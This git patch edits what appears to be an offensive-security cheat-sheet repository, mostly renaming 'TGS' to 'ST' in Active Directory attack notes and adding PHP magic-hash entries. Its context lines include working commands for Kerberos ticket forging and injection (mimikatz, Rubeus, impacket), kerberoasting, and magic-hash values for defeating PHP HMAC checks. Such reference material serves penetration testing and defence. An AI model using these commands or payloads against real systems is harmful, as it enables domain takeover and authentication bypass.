From 2be739ea4fc6aa9e2d3b4177b35eb4d16e4ebfb2 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 6 Sep 2022 10:03:49 +0200 Subject: [PATCH] Fixing TGS/ST --- .../Active Directory Attack.md | 20 +++++++++---------- .../Windows - Privilege Escalation.md | 6 +++--- Type Juggling/README.md | 20 +++++++++++-------- 3 files changed, 25 insertions(+), 21 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f46dfd2..fab2467 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -721,7 +721,7 @@ Requirements: #### samAccountName spoofing -> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller. +> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller. **Requirements** @@ -1670,7 +1670,7 @@ Mitigations: ### Pass-the-Ticket Silver Tickets -Forging a TGS require machine account password (key) or NTLM hash of the service account. +Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account. ```powershell # Create a ticket for the service @@ -1707,7 +1707,7 @@ Mitigations: > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) -Any valid domain user can request a kerberos ticket (TGS) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. +Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. * [GetUserSPNs](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite @@ -2650,10 +2650,10 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi # Get a TGT using the newly acquired certificate via PKINIT proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR - # Get a TGS for the target account + # Get a ST (service ticket) for the target account proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v - # Utilize the TGS for future activity + # Utilize the ST for future activity export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab ``` @@ -2751,7 +2751,7 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr * using bloodyAD: `bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'` -* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it. +* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it. ```powershell # Check for interesting permissions on accounts: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} @@ -3117,14 +3117,14 @@ mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... / mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi ``` -#### Use the Trust Ticket file to get a TGS for the targeted service +#### Use the Trust Ticket file to get a ST for the targeted service ```powershell .\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local .\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt ``` -Inject the TGS file and access the targeted service with the spoofed rights. +Inject the ST file and access the targeted service with the spoofed rights. ```powershell kirbikator lsa .\ticket.kirbi @@ -3161,7 +3161,7 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma ### Kerberos Unconstrained Delegation -> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html +> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html > When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory. @@ -3318,7 +3318,7 @@ PS> ls \\dc01.offense.local\c$ Resource-based Constrained Delegation was introduced in Windows Server 2012. -> The user sends a TGS to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html +> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html 1. Import **Powermad** and **Powerview** diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 70e1c81..35cc70a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -956,9 +956,8 @@ Example: "Windows Help and Support" (Windows + F1), search for "command prompt", Look for vuln drivers loaded, we often don't spend enough time looking at this: ```powershell -# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery - -PS C:\Users\Swissky> driverquery.exe /fo table +# Native binary +PS C:\Users\Swissky> driverquery.exe /fo table /si Module Name Display Name Driver Type Link Date ============ ====================== ============= ====================== 1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM @@ -972,6 +971,7 @@ acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM +# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery PS C:\Users\Swissky> DriverQuery.exe --no-msft [+] Enumerating driver services... [+] Checking file signatures... diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 41bdb4c..37ebd0a 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -52,22 +52,22 @@ function validate_cookie($cookie,$key){ ... ``` -The $cookie variable is provided by the user. The $key variable is a secret and unknown to the user. +The `$cookie` variable is provided by the user. The $key variable is a secret and unknown to the user. -If we can make the calculated hash string Zero-like, and provide "0" in the $cookie['hmac'], the check will pass. +If we can make the calculated hash string Zero-like, and provide "0" in the `$cookie['hmac']`, the check will pass. -``` +```ps1 "0e768261251903820937390661668547" == "0" ``` We have control over 3 elements in the cookie: -- $username - username you are targeting, probably "admin" -- $hmac - the provided hash, "0" -- $expiration - a UNIX timestamp, must be in the future +- `$username` - username you are targeting, probably "admin" +- `$hmac` - the provided hash, "0" +- `$expiration` - a UNIX timestamp, must be in the future Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC. -``` +```ps1 hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49" hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4" hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b" @@ -80,8 +80,10 @@ hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e17489230 If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float. -| Hash | “Magic” Number / String | Magic Hash | Found By / Description | +| Hash | "Magic" Number / String | Magic Hash | Found By / Description | | ---- | -------------------------- |:---------------------------------------------:| -------------:| +| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | +| MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | | MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | | MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | @@ -106,3 +108,5 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); * [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html) * [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/) * [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf) +* [spaze/hashes - Magic hashes – PHP hash "collisions"](https://github.com/spaze/hashes) +* [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404_)](https://offsec.almond.consulting/super-magic-hash.html) \ No newline at end of file